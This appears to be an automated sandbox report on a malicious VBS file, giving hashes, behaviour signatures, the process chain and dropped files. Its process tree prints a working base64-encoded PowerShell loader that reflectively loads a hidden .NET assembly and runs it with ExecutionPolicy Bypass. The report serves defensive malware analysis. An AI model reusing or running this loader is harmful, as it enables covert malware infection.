2a2f86509bacd2fb5f9e972c1f77295d98ac4a620f1ae415a26b9fbc2da964da

General

Target

b3f2c0468d40628a6fa17d8dfaca76b89525063c9f1c3b337f9929311e4d7cfe.vbs
Size

196KB
MD5

154c5d86522ffd7a1cd03d23b3b19ee5
SHA1

41743b862c01c4c8eef124a85560657f58a0a575
SHA256

b3f2c0468d40628a6fa17d8dfaca76b89525063c9f1c3b337f9929311e4d7cfe
SHA512

0179e5323e21f3f34dbbe5ed2930ca25fa8158db15824adae867e9cf74df1a642516aa86910676c06a3f39fe9a7f7296f8f5fa70e7a23b4227535bd0b525a760
SSDEEP

3072:k+az7K1R0Qnfs+7d7mz6WK5jiAQeQ/fCdkoLTIXlcoutMAp5Fvk2:SCXkKIeWK5jFw3CGc9tXp5Fvk2

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2980 powershell.exe
2552 powershell.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2980 powershell.exe
2552 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2980 powershell.exe
Token: SeDebugPrivilege 2552 powershell.exe

pid	process
2980	powershell.exe
2552	powershell.exe

pid	process
2980	powershell.exe
2552	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeDebugPrivilege	2552	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

WScript.execmd.exe

description	pid	process	target process
PID 2320 wrote to memory of 1660	2320	WScript.exe	cmd.exe
PID 2320 wrote to memory of 1660	2320	WScript.exe	cmd.exe
PID 2320 wrote to memory of 1660	2320	WScript.exe	cmd.exe
PID 1660 wrote to memory of 2980	1660	cmd.exe	powershell.exe
PID 1660 wrote to memory of 2980	1660	cmd.exe	powershell.exe
PID 1660 wrote to memory of 2980	1660	cmd.exe	powershell.exe
PID 1660 wrote to memory of 2980	1660	cmd.exe	powershell.exe
PID 1660 wrote to memory of 2552	1660	cmd.exe	powershell.exe
PID 1660 wrote to memory of 2552	1660	cmd.exe	powershell.exe
PID 1660 wrote to memory of 2552	1660	cmd.exe	powershell.exe
PID 1660 wrote to memory of 2552	1660	cmd.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b3f2c0468d40628a6fa17d8dfaca76b89525063c9f1c3b337f9929311e4d7cfe.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2320

C:\Windows\System32\cmd.exe
cmd /c ""C:\Users\Admin\cvtres.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1660

C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KJGVuY29kZWRBcnJheSA9IEAoMTU5LDIyMCwyMzgsMjM4LDIyNCwyMzIsMjIxLDIzMSwyNDQsMTY5LDE5MiwyMzMsMjM5LDIzNywyNDQsMjAzLDIzNCwyMjgsMjMzLDIzOSwxNjksMTk2LDIzMywyNDEsMjM0LDIzMCwyMjQsMTYzLDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY3LDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY0LDE4MikNCiRkZWNvZGVkU3RyaW5nID0gQ29udmVydC1Bc2NpaVRvU3RyaW5nICRlbmNvZGVkQXJyYXkNCg0KDQokZmlsZVBhdGggPSBKb2luLVBhdGggJGVudjpVc2VyUHJvZmlsZSAiY3Z0cmVzLmJhdCINCiRsYXN0TGluZSA9IEdldC1Db250ZW50IC1QYXRoICRmaWxlUGF0aCB8IFNlbGVjdC1PYmplY3QgLUxhc3QgMQ0KJGNsZWFuZWRMaW5lID0gJGxhc3RMaW5lIC1yZXBsYWNlICdeOjonDQokcmV2ZXJzZSA9IFJldmVyc2VTdHJpbmcgJGNsZWFuZWRMaW5lDQokZGVjb21wcmVzc2VkQnl0ZSA9IERlY29tcHJlc3NCeXRlcyAtY29tcHJlc3NlZERhdGEgJHJldmVyc2UNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQokYXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGRlY29tcHJlc3NlZEJ5dGUpDQoNCkludm9rZS1FeHByZXNzaW9uICRkZWNvZGVkU3RyaW5nDQoNCkNsb3NlLVByb2Nlc3MgLVByb2Nlc3NOYW1lICJjbWQi')) | Out-File -FilePath 'C:\Users\Admin\cvtres.ps1' -Encoding UTF8"
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2980

C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\cvtres.ps1"
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2552

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
e5684ad0a13c870aa9165ca7ab564f6e

SHA1
d8023b4467eb2292a0c6566917b1e35d6ca07b7a

SHA256
99a31c3a2b73bd18943646fc13ebf546a6750ea74307ef23161c53873d409841

SHA512
34cd92e3fe08955d99d6c62a8a4a395f2bf64cae6f7b7342b92c23bdb24df61df3949a8d7ba833032362e9bcbff4f32803a525f4d8213730baac2f7430c8b69a

Download Submit
C:\Users\Admin\cvtres.bat
Filesize
191KB

MD5
2d52ffbf8c9233a4c0e73ddef6f59073

SHA1
19f2b5b063b11d8ed5a61178eb1ba4e1243ae21f

SHA256
90cf988538695ba2552ace7664b3badb2fd2c576803f9335a9961b875ceeac23

SHA512
a5d14be2d9e2e2578761e64e58ca778a8872c821b80b7d14d836bdbb58ae77f8155af8fd4e9b209c47eca95562511c722ad0d3192f0613296d2212ea1211648e

Download Submit
C:\Users\Admin\cvtres.ps1
Filesize
1KB

MD5
6f35158874ea4b14043a77ba49bf342a

SHA1
a2675898e47ae854c2380841acdb9fdbe7b050c1

SHA256
d2e1c1fef3af43c1c672e99d0040f36768a6041ff9d0d3d2d71751b39e4e1d09

SHA512
2696dfdeca5fbde843851588aff2bcf70d13dad9122fbec8b48d2aed066a2794bd39781981b31908343b2aef5f8a716f74bdea19dd49690db1c91930c7013281

Download Submit
memory/2552-23-0x0000000073730000-0x0000000073CDB000-memory.dmp

Filesize
5.7MB

Download
memory/2552-24-0x0000000002CD0000-0x0000000002D10000-memory.dmp

Filesize
256KB

Download
memory/2552-25-0x0000000073730000-0x0000000073CDB000-memory.dmp

Filesize
5.7MB

Download
memory/2552-27-0x0000000073730000-0x0000000073CDB000-memory.dmp

Filesize
5.7MB

Download
memory/2552-28-0x0000000073730000-0x0000000073CDB000-memory.dmp

Filesize
5.7MB

Download
memory/2980-15-0x0000000002250000-0x0000000002290000-memory.dmp

Filesize
256KB

Download
memory/2980-17-0x0000000073780000-0x0000000073D2B000-memory.dmp

Filesize
5.7MB

Download
memory/2980-14-0x0000000002250000-0x0000000002290000-memory.dmp

Filesize
256KB

Download
memory/2980-13-0x0000000073780000-0x0000000073D2B000-memory.dmp

Filesize
5.7MB

Download
memory/2980-12-0x0000000073780000-0x0000000073D2B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing